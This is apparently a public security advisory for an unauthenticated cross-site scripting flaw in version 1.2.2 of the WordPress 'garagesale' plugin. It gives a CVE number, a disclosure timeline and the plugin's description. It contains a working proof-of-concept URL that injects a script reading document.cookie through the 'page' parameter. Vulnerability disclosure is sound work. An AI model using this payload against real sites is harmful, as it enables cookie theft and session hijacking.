wp-plugin : garagesale – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : garagesale

 

Effected Version : 1.2.2 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wordpress/wp-content/wp-plugs/garagesale/templates/printAdminUsersList_Footer.tpl.php?page=page%22%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4532

 
Plugin Description :
 
This plugin is a lightweight solution to put a kind of garage sale on your wordpress page.

Users can put their stuff with a picture, description, price and contact on a wordpress site.
The users are wordpress users with access right Subscriber (so every registered user can use the garage sale).

Put the string "[GarageSaleList]" on any page or article post where you want to display the list of sale items.

This Plugin creates an own subfolder within the upload folder for the pictures.

look at http://www.eibler.at/garagesale/ for detailled description of usage and installation

Leave a Reply

Your email address will not be published. Required fields are marked *